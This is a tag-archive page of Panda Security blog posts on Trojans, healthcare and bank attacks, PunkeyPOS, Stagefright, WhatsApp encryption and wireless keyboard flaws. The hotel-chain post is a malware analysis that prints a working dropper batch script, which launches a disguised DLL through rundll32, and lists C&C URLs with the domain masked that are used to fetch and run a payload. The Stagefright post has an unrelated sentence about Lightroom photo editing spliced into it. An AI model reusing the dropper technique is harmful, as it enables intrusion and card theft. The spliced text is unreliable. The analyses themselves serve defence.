Tag Archives: highlighted

Panda Security

They can remotely access and control my computer?

Leave a comment

trojans panda security

We are always talking about ransomware and the importance of keeping your corporate network protected, and we want to warn our readers about the popular Trojan attacks that are going after small and medium sized businesses. But how do you know when it’s a Trojan? How can you secure yourself against Trojans?

5 Things You Should Know

  1. They are malicious software programs designed to rob information or take control of the computer. These attacks target businesses that manage top-secret information.
  2. Trojans are the most popular type of malware and have been for years. Running closely behind them is Ransomware.
  3. Trojans seem harmless but as soon as they are executed they will damage systems and steal information.
  4. Most of them create backdoors and give unauthorized users remote access and control over your system…but they go unnoticed!
  5. Trojan horse: The professional trickster. It disguises itself as something its not.

trojans infographicTrojans: Topping the Charts

Trojans make up the majority of the 227,000 malware samples that are detected daily by PandaLabs. Month after month, they continue to be in first place as the most created malware.

Increasing since the second quarter of 2016, Trojans currently make up 66.81% of the new malware samples created this quarter. Viruses make up 15.98% (Worms 11.01%, PUPs 4.22% and Adware/Spyware at 1.98%).

What do their creators want to achieve?

  • Steal personal and corporate information: bank information, passwords, security codes, etc.
  • Take photos with webcams, if there are any!
  • Erase the hard-drive.
  • Capture incoming and outgoing text messages.
  • Seize the call registry.
  • Access (consult, eliminate and modify) the address book.
  • Make calls and send SMS messages.
  • Use the GPS to figure out the geographic location of the device.

How can we protect ourselves from Trojans?

 Avoid downloading content from unfamiliar websites or sites with dubious reputations.

– Monitor downloads from p2p applications.

– Keep your advanced security solution updated. Install one of the Panda Solutions for Companies that best adapts to you and protect yourself from these dangers.

– Analyze your computer for free and make sure it’s Trojan free.

The post They can remotely access and control my computer? appeared first on Panda Security Mediacenter.

Panda Security

Panda Security Dissects the “Cyber-Pandemic”

Leave a comment

pandasecurity-hospitals-1

Economic gain is the fuel that motivates cyber-criminals. There are thousands of credit cards stolen, infected computers and POS terminals, and kidnapped information that cyber-criminals use in order to make large sums of money. These victims are in the line of fire, and are willing to pay these ransoms in order to get their private information back.

Recently, we have seen particular cases of large scale attacks that are designed specifically for industries, like the hotel sector or certain financial institutions, but can you imagine what would happen if a hospital fell into the hands of a cyber-criminal? PandaLabs, Panda Security’s anti-malware laboratory, presents a new whitepaper, “The Cyber-Pandemic”, with examples of real threats that seem science fictional but can affect us all.

A History of Attacks

The healthcare industry is very technologically advanced but it also has huge security flaws, making it an easy target for cyber-criminals. If we add this to the immense amount of highly sensitive information that is managed by hospitals, pharmacies and health insurance providers, plus the high price that it could be sold for on the black market where a medical history is much more valuable than a credit card, we are able to understand how this was the most attacked industry last year.

A Timeline of the Most Notorious Attacks

2008: The University of Utah Hospital and Clinics announced that the private information belonging to 2.2 million of their patients was compromised. The information was stored on backup tapes belonging to an external employee that was subcontracted, who failed to comply with the established protocols.

2015: One of the most infamous attacks that was aimed at the second largest Insurance company in the United States, Anthem. In this attack 80 million customer records was stolen, including sensitive data such as Social Security numbers.

2016: The cyber-attack that hit the Hollywood Presbyterian Medical Center in Los Angeles left their employees without access to patient medical records, emails and other systems. As a result, some patients could not receive treatment and had to be transferred to other hospitals. What was the ransom? 3.7 million dollars.

pandasecurity-hospitals-2

They Can Hack Our Health

These attacks have demonstrated that these cyber-criminals are capable of shutting down all hospital activity, When we take into account all the medical equipment that is connected to the network, we can imagine how this cyber-pandemic could affect any ordinary person.

In 2013, former U.S. Vice President Dick Cheney revealed that his doctors disabled wireless communication on his pacemaker because they saw that it was highly possible for someone to remotely attack his device if they wanted to. Globally known hackers have demonstrated how it is possible to remotely alter a portable insulin pump that is used by thousands of diabetics or how to remotely manipulate a pacemaker in order to send a life-threatening electric shock.

In a hospital room, everything from the belts that raise your feet to the infusion pump that injects your medicine is connected to a computer. To demonstrate how easy it is to access this equipment, a number of these machines were tested to alter the dose of medicine to lethal levels. This can be done on more than 400,000 of these pumps throughout the world that remain vulnerable.

How Can We Avoid These Attacks?

It is important to take note: paying a ransom does not guarantee that stolen documents or information will be returned. The ransom payment did not secure that the victim got back their documents in any of these examples. It is better to avoid this altogether. Here are some of PandaLab’s recommendations on how you can avoid a cyber-pandemic:

  • Depend on a cyber-security solution that has both advanced protection functionalities and is also able to detect and remedy possible threats.
  • There is something in common in all of the systems that were targeted in the attacks: a lack of control. What would have helped prevent these attacks is a cyber-security solution that is capable of controlling all running processes, in every machine, connected to the network.
  • Revise staff policies and control systems in order to adjust the privacy requirements and adapt them to available technology.
  • Keep all operating systems and company devices updated.

To help the Healthcare sector stay ahead of cyber-crime, Adaptive Defense 360 offers complete security to fight off attacks. Adaptive Defense 360 provides everything that your company may need to remedy known vulnerabilities.

Download this whitepaper and learn how to avoid a “Cyber-Pandemic”, here:

Download

Check out our Cyber-Pandemic Infographic

 

 

 

The post Panda Security Dissects the “Cyber-Pandemic” appeared first on Panda Security Mediacenter.

Panda Security

POS and Credit Cards: In the Line of Fire with “PunkeyPOS”

Leave a comment

pandasecurity-punkeypos-principal.png

PandaLabs, Panda Security’s anti-malware laboratory, has been working on an in-depth investigation since May related to Point of Sale terminals (POS) in restaurants across the United States. A new malware sample was discovered during this investigation called PunkeyPOS, a malware variant that is able to access credit card data. PandaLabs left this information at the disposal of American law enforcement so they can take the appropriate actions. Let’s see what this is and how it operates.

How can they steal your card without touching your wallet?

PunkeyPOS runs seamlessly in all Windows operating systems. The cyber-criminal’s plan is to install the malware in POS terminals in order to steal sensitive information such as account numbers, magnetic strip contents (tracks) from bank cards, etc.

PunkeyPOS seems simple:

It installs a keylogger that is responsible for monitoring keystrokes, then it installs a RAM-scraper that is responsible for reading the memory of all processes running on the system.

Based on the information it captures, the malware performs a series of controls to determine what is valid and what isn’t. Regarding the keystrokes, PunkeyPOS ignores all information other than credit card data. It is mostly interested in tracks1/2 from the process memory that is obtained from RAM-scraping. The POS terminals read this information from the bank cards’ magnetic strips and then can use this data to clone the cards at a later time.

Once the relevant information has been obtained, it is encrypted and forwarded to a remote web server which is also the command and control (C&C) server. In order to avoid the detection of the card information in case somebody is scanning the network traffic, it is encrypted before it is sent using the AES algorithm.

The command and control (C&C) server address can be easily obtained based on this malware sample through reverse engineering or analyzing their communications. This is the main page of the control panel; it requires a username and password to get access:

pandasecurity-punkeypos-1

Follow the Trail to the Digital Pickpocketers

The cyber-criminals behind this attack haven’t been very careful. Since the server was not configured correctly, PandaLabs was able to access it without credentials.

Because of their neglect, PandaLabs was able to see where PunkeyPOS sends the stolen information. In addition to being in front of a panel that is used to access the stolen data, from this panel cybercriminals can reinfect or update current clients (POS bots).

pandasecurity-punkeypos-2

The version of the analyzed PunkeyPOS sample is hardcoded: “2016-04-01”. If we compare this sample with older versions, some from 2014, we can barely see any difference in the way it operates (in the References section of this article you can find links that will go further into detail about how it works.)

PandaLabs has been able to gain access to the control panel of PunkeyPOS, and has geolocated around 200 Point of Sale terminals that were compromised by this specific malware variant. We can see that virtually all the victims are in the United States:

pandasecurity-punkeypos-3

Taking into account how easy it is to sell this information on the black market, and how convenient it is to compromise these POS terminals anonymously through the internet, we are certain that cyber-criminals will be increasingly drawn to these terminals.

Protect your devices proactively from these types of attacks with an advanced cyber-security solution like Adaptive Defense. Real-time control of all inappropriate user operations is in your hands.

References:

http://krebsonsecurity.com/2016/06/slicing-into-a-point-of-sale-botnet/

https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges—Punkey/

 

The post POS and Credit Cards: In the Line of Fire with “PunkeyPOS” appeared first on Panda Security Mediacenter.

Panda Security

Billion Dollar Sting: A Financial Corporation’s Worst Nightmare

Leave a comment

Banks panda security

For years cybercriminals have had their focus on money, and most specifically in the financial system. For more than a decade they have been mainly targeting the weakest link in the chain: the final user that uses online banking services. This approach has some benefits for these cybercriminals: poor security in the end user, small money thefts that can go undetected for some time, etc. However it also has some cons: need of money mules, being able to find (infect) a victim that is using one of the targeted banks, avoiding antimalware software, etc.

In other words, they can make a lot of money, but at the same time it will require a lot of effort from their side.

Where is the big money? Financial institutions themselves. There is no discussion about this. However it is hard to break into them, and even more complicated to understand how their specific internal systems work in order to be able to fully compromise them, take the money and leave without leaving a trace. It requires a great investment to gather all the intelligence needed for this kind of heist, it is not easy to perform and it might require several months, if not years, of careful planning. Anyway it is worth it if 1 billion dollars can be stolen in just one hit.

This is basically what happened in February at the Bangladesh Central Bank, where attackers infected their system with malware specifically created for this attack and tried to make fraudulent transfers totaling 951 million dollars. That money was in the account Bangladesh Central Bank had at the Federal Reserve Bank of New York. Gladly most of the transfers could be blocked, and “only” 81 million dollars were stolen. But this was not the only case.

Tien Phong Bank, a Vietnamese bank suffered a similar attack in the last Quarter of 2015. That time cybercriminals also tried to make transfers through SWIFT, although the bank could realize in time and could halt the 1 million dollars transfers already on route. And a few months earlier, in January 2015, a bank from Ecuador –Banco del Austro –was hit in a very similar way, and 9 million dollars were stolen.

banks-sting-illustration

What are the similarities among the three cases? Malware was used to perform the attack, and all the money transfers were made using the SWIFT network. SWIFT (Society for Worldwide Interbank Financial Telecommunication) is a cooperative society formed by thousands of financial institutions around the world. Founded in 1973, it provides different services to their members.  The secure transfer of money among banks is one of the services offered and processed by the SWIFT network.

The biggest concern was if the SWIFT network, that was believed to be secure, had been compromised. If this was the case the entire financial system could be at risk. It looks like this was not the case and SWIFT has issued a press release where it clearly states this: “the SWIFT network, core messaging services and software have not been compromised.”

However, that depends on the point of view: cybercriminals successfully used the SWIFT network to perpetrate these heists. And they took a similar approach as the one described in the beginning of this article: target the weakest link in the chain. SWIFT provides a safe environment, but at the end of the day, each financial institution has its own internal system that communicates with the SWIFT network. In the same way cybercriminals were targeting final customers with banking Trojans, now instead of going after the SWIFT network, they are going after the banks connected to it. This means that, while we can say that the SWIFT network is safe so far, we can also say that there are potentially thousands of holes that exist, as many as financial institutions connected to them.

How did these attacks happen exactly?

There are still many unknowns, and some of them won’t ever be solved. These criminals have covered their tracks. In fact, the main purpose of one of the malware pieces used in the heist was to delete these tracks. One thing we know for sure: malware was used. How did it enter? For this we have two different options: there was help from an insider, or it was an external attack through Internet. Both seem plausible, even more so after we learned that the security infrastructure at the Bangladesh Central Bank was obviously not good enough.

If we take a deeper look at the Bangladesh incident, it was a highly sophisticated attack targeting specifically the Bangladesh Central Bank, but the way the malware is structured (using an external configuration file, which makes no sense if this was just a one time job) points out that we’ll find new victims. They will go after banks that have flaws / weaknesses in their security model, such as those that do not monitor the execution of software in their network, and so far the information we have on the other attacks confirm this hypothesis.

In their customer communication SWIFT tells all the banks that their first priority should be to ensure that you have all preventative and detective measures in place to secure your environment.

So that’s easy, right? How can we ensure that? Is there anything at all that can be done to completely prevent any new heist?

Criminals will keep trying, and eventually they may succeed. Anyway we know what they are after (money) and what computers they want to target (those connecting to the SWIFT network). Access to the SWIFT network is highly restricted, it can only be performed from certain computers and only certain users are allowed access to them. Those computers have to be highly fortified, and of course we are not just talking about having updated software and use an antimalware solution.

Only pre-approved software should be let executed in those computers. All executed processes have to be monitored in real time, logging everything that happens and looking for abnormal behaviors. It does not matter if the attack comes from the Internet or with the help of an insider. No unauthorized software can be allowed to be executed in those terminals, and the allowed one has to be protected with anti-exploit technologies and monitored in real time in case some abnormal behavior takes place.

Of course, if some person has physical access to a target computer, at some point they could disable any security solution, which is not a problem by itself if you can get an alert about it on the console used by the security team. Is there any better indicator of compromise than someone tampering with the security software installed in a critical system?

How to avoid these cyber-attacks

One of the most frustrating things that victims have to go through is the lack of knowledge of how the incident happened. How did it happen? When did it start? For how long? What did they do once the computers were compromised? Was there any confidential information leak? As an example, in the Bangladesh Central Bank case, three pieces of malware could be recovered after the incident, but that’s what there was left. Attackers probably used many other tools that were deleted and the victim won’t know anything about them.

Knowledge is power: being able to know how a security incident happened will help you fix any security weakness in your environment.

There are only a few solutions that are capable of delivering this level of service, Panda created Adaptive Defense for these type of cases and we already have financial companies, governments, and big corporations in different verticals (health, hotels, insurance, public utilities, etc.) actively using Panda Adaptive Defense. All of them suffer not just the regular cyber-attacks, but really targeted attacks against their assets. We have shown some of them, such as the one targeting a luxury hotel chain a few weeks ago or the one against oil tankers.

Our conclusion after studying these attacks is that If those banks would have had Panda Adaptive Defense in their SWIFT connected terminals, the heist could have been stopped in time.

The post Billion Dollar Sting: A Financial Corporation’s Worst Nightmare appeared first on Panda Security Mediacenter.

Panda Security

Advanced Attacks against Hotel Chains: A practical example

Leave a comment

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

advanced attacks hotels

This is a hotel reservation form that is to be filled out by a customer. They wrote their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Despite that the Word icon shows up, it is an executable file.

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file is shown below:

@echo off

start “” ROCA.ING.docx

Set xOS=x64

If “%PROCESSOR_ARCHITECTURE%”==”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86

IF “%xOS%” == “x64” (start “” C:WindowsSysWOW64rundll32.exe adobeUpd.dll,Wenk)

IF “%xOS%” == “x86” (start “” C:WindowsSystem32rundll32.exe adobeUpd.dll,Wenk)

ping -n 12 localhost

As we can see, the first thing it does to its victim is open the Word document in order to run and complete the trick. Then, adobeUpd.dll runs with the parameter “Wenk”. While executed, it modifies the file and marks it as read-only and hidden, and creates an entry in the Windows registry that runs every time the computer is turned on.

Contact with a specific URL:

http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

Then it downloads a file that contains the user of the given URL parameter (iPmbzfAIRMFw). In the event of a match, it attempts to download the file

http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we try to download it, it is not available; it will not be in our customer system either, as we blocked the infection attempt and the malware was not able to run there. The domain of the URL is exactly the same domain as our customer, except that they have “.com” while the attackers registered a domain with the same name but in Gabon (“.ga”). This way, the similarity to the domain name won’t attract attention if it is seen by the hotel’s security team when analyzing network traffic.

In spite of the fact that the file iPmbzfAIRMFw.jpg is not available, if we look at the code adobeUpd.dll we can see that they are actually looking for a specific mark in this file, then it decrypts the data from it and runs it as a PE (created as “Tempsystm”).

Subsequently, adobeUpd.dll remains in a loop, randomly connecting every several minutes to:

http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm

As we see, this attack is specifically directed to this hotel chain. The criminals have already removed all traces of the server where you could connect to the malware, and as we aborted the attack we can only speculate what is what they were going to do next. In our experience, this type of attacks seeks to engage a team of the enterprise of the victim to then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.

The traditional anti-virus does not work against this type of attack, since they are threats created specifically for a victim and they always ensure that the malware is not detected by signatures, proactive technologies, etc. that current anti-malware solutions have built. That is why have EDR type of services (Endpoint Detection & Response) are equipped with advanced protection technology, something vital for effective protection against these attacks.

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.

Panda Security

Uncovering the WhatsApp encryption

Leave a comment

 

mobileAvid WhatsApp-ers were the first ones to notice the new security changes the company put into action last week.  Now, your conversations on WhatsApp are safer through end-to-end encryption.  With this new security system, your messages safely travel from mobile to mobile, from your hands to the person on the other side of the message.

The notification would appear in a message like this:

FOTO 1 (ENG)

Say you are at your favorite coffee shop, sipping on a hot drink and you decide to connect to the Wi-Fi, but instead connect to a false Wi-Fi network (hackers set-up fake networks to gain access your information like e-mail, passwords and other information.)

In theory, cyber-criminals could steal your messages but it’d be pretty pointless without a decryption key. Breaking public keys, which are different for each message, would be both time-consuming and extremely complicated. Instead of juicy information, the third-party would see senseless characters in the place of the message.

The security measure reassures us that the content coming into our mobiles (i.e. text, photos, videos, files, and voice recordings) are completely private.iStock_000017519004_Large

But end-to-end encryption is not the solution to everything.

However, it is a giant step for the safety and quality of our chats.

Experts say there several factors to consider:

  • To make the system work, all participants must have updated their WhatsApp. If one of the members of a group still using an older version, the chats remain “unsafe”.
  • This security measure ensures that messages travel from one mobile to another securely, but they remain vulnerable to attack if they are stored on the devices. Not all “smartphones” are the smartest: some don’t encrypt their content but most modern ones do by default or at least allow it as an option (ex. the latest iPhone or Lollipop by Android).
  • Sometimes the juiciest of information is not shown in our messages, but in something called metadata, which is “data that provides information for other data” like who called who, when they called, for how long, etc.  In the end, if your sensitive information ends up in the hands of a country’s secret service or a judge, WhatsApp’s parent company, Facebook, would be responsible for it.  Do you trust them?

 

You should update your WhatsApp and enjoy the insurance of end-to-end encryption, but don’t solely depend on it for your full-protection and privacy. Although it’s a definite upgrade in mobile security, it’s still an insufficient form of protection.

 

The post Uncovering the WhatsApp encryption appeared first on Panda Security Mediacenter.

Panda Security

They’ll hack your Android in T Minus 10 seconds

Leave a comment

FOTO 1

The word that scared all Google users last summer is back and worse than ever. Stagefright, nicknamed by its founder Metaphor, is even more dangerous in its new version.

Much like its name’s meaning, Stagefright, hides deep in the Android library, unnoticeable to Android users as they watch videos of cute puppies and crafty DIY hacks, all the while exposing themselves to its vulnerabilities.

How many devices are affected?

Now in its second swing, these Stagefright vulnerabilities have already affected hundreds of thousands of Android devices through holes in the multimedia library. More specifically, they have even affected those who use versions 5.0-5.1 (23.5% of affected Androids) and some using versions 2.2 and 4.0 (unsafe due to old terminals that had been exposed to previous viruses).

Google fights back

After the bugs’ discovery, Google implemented a series of bug-fixes and other security measures, even creating its own group of vulnerabilities to counter the attacks. Upgrades and patches were set up to make it more difficult for Stagefright to infiltrate an Android in a real attack.

Unfortunately, Metaphor has been able to dodge these protection mechanisms that were added to the more modern versions of the Android. With this new exploit, as their own creators have shown, Stagefright can easily control devices as diverse and modern as the Nexus 5, Samsung Galaxy S5 UN, UN LG G3 or HTC One UN.

So, how exactly does Stagefright break in?

Sneakily. The user does not need to be using their smartphone during an attack, really. In the case of Stagefright, the attacker can gain access through a particular website (e.g. through a malicious video link received by email or MMS). In a proof of concept, an email with a corrupted video link promoting videos of kittens leads to a page actually containing this material. The recipient has no way of knowing, that while the video is rendering, their Android is also being attacked. It can take as little as 10 to 15 seconds for the cyber-criminal to have control of their victim’s terminal.

Spent some time today messing with Lightroom's post-processing tools to teach myself. I don't want to end up relying on them for every shot but it's nice to know what I have to work with.

Metaphor’s strategy is not exactly new. It largely relies on the attacks that were released last summer, when the holes were first discovered. However, today’s danger lies in Stagefright’s ability to bypass ASLR, which is the barrier Google raised in all versions of Android after 4.1. The problem is that this new threat binds itself not only to older devices but also to more modern ones. Those who have Android´s Lollipop 5.1 are not even safe, representing about 19% of all of Android smartphones.

No matter what, the best way to protect your Android and all other risks associated with Stagefright is to keep your operating system as up-to-date as possible and install a good antivirus. If your phone has been left out of the recent updates, take caution: you should not browse pages unless they are fully trusted. Even those who promise photos of adorable and fluffy kittens.

Panda Security

Cyber-crooks can use your wireless mouse and keyboard!

Leave a comment

wireless-keyboard

Remember how the problems you had with the nightmare of tangled cables going in and out of your computer went away the day you discovered wireless devices? In fact, you swore never to touch a wired device again after buying a keyboard and mouse capable of communicating with your computer without needing to be physically connected to it. You even went as far as to replace your laptop’s touchpad with a mouse that communicates with your computer via a small USB connector as if by magic.

Well, we have news for you: A group of security experts have discovered that these devices, as convenient as they are, are not very safe. Cyber-criminals can take control of users’ computers remotely by exploiting flaws found in wireless keyboards and mice from seven major manufacturers (Logitech, Dell, Microsoft, HP, Amazon, Gigabyte and Lenovo).

The security hole affects millions of devices that use chips sold by the Norwegian firm Nordic Semiconductor. These chips allow devices to establish a short-wave radio communication with the target computer. Although these chips are capable of encryption, they require that vendors write their own firmware to implement that encryption and secure the connection between computers and peripheral devices. However, many companies don’t take the precaution to encrypt those communications.

And even if they did, it wouldn’t be much use. The companies that do encrypt their communications do not properly authenticate communicating devices, allowing rogue devices to inject unencrypted keystrokes over the same connection. Actually, the security experts that unveiled this vulnerability found several flaws in the firmware of the keyboards and mice that use those chips.

crazyradio-usb

A simple and affordable USB adapter with an antenna and a laptop was all they needed to demonstrate that it is possible to interfere with the radio protocol used by these devices to communicate with their USB dongle and send commands to the target computer. To do that, the target computer must be relatively close to the antenna, although they have been able to control Lenovo wireless devices from 180 meters away.

So, any attacker that used the method discovered by these researchers could take over a computer without laying a finger on its mouse or keyboard. The commands sent by the hacker would be interpreted by the computer as coming from the legitimate device.

Now, what could an attacker that took advantage of this flaw actually do on the affected system? Nothing much, really. Even if they managed to access the targeted computer, they wouldn’t be able to see its screen, so even unlocking the computer would be a difficult task not knowing the relevant password.

According to these experts, if the computer were actually unlocked, the cyber-crook would be able to download malware that could allow them to take full control of the computer.

However, the attacker would only have the same privileges as the legitimate user. If the computer were in an office, for example, they probably wouldn’t have the necessary permissions to install malicious programs on it.

keysweeperA Logitech spokesperson has already claimed that the “vulnerability would be complex to replicate” and “is therefore a difficult and unlikely path of attack.”  Despite that, the company has decided to develop a firmware update for the affected devices.

Similarly, Lenovo has announced that it will give users the option to replace the affected devices.  Microsoft, however, has simply stated that it will only launch an update as soon as possible.

This is not the first time that researchers warn of the dangers of wireless keyboards and mice. Last year, renowned security expert Samy Kamkar developed Key Sweeper, a keylogger hidden in a fake USB charger that logged the keystrokes typed on any Microsoft wireless keyboard.  With the help of an Arduino board, anyone could develop this keylogger software and find out what others were typing.

This research is extremely significant as it demonstrates that millions of devices are vulnerable. Taking into account that it may encourage cyber-criminals to start doing some tests, it may be a good idea to start updating your devices’ firmware whenever possible, and even replace vulnerable keyboards and mice with wired peripherals or, better still, wireless devices that communicate with computers via Bluetooth.

Bear this in mind, however: as cyber-crooks need to be close to the target device to carry out this attack, it seems logical that they set their eyes on companies rather than home users. But don’t lower your guard: prevention is better than cure…

The post Cyber-crooks can use your wireless mouse and keyboard! appeared first on MediaCenter Panda Security.